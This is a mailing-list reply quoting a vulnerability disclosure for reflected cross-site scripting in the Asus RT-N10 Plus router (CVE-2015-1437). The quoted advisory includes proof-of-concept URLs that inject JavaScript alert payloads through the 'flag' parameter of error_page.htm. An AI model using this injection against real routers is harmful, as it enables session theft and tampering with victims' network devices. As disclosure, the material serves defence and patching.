*** kingkaustubh (at) me (dot) com wrote:
> #####################################
> Title:- Reflected XSS vulnerability in Asus RT-N10 Plus router
> Author: Kaustubh G. Padwad
> Product: ASUS Router RT-N10 Plus
> Firmware: 2.1.1.1.70
> Severity: HIGH
> Auth: Not required
> CVE ID: CVE-2015-1437
> # Description:
> Vulnerable Parameter: flag=
> # Vulnerability Class:
> Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
[...]
> Enter this URL
> 1.http://router/error_page.htm?flag=initial78846%27%3balert(document.lastmodified)%2f%2f372137b5d
> 2.http://router/error_page.htm?flag=initial78846%27%3balert("Hacked_BY_S3curity_B3ast")%2f%2f372137b5d
https://sintonen.fi/advisories/asus-router-auth-bypass.txt
Micha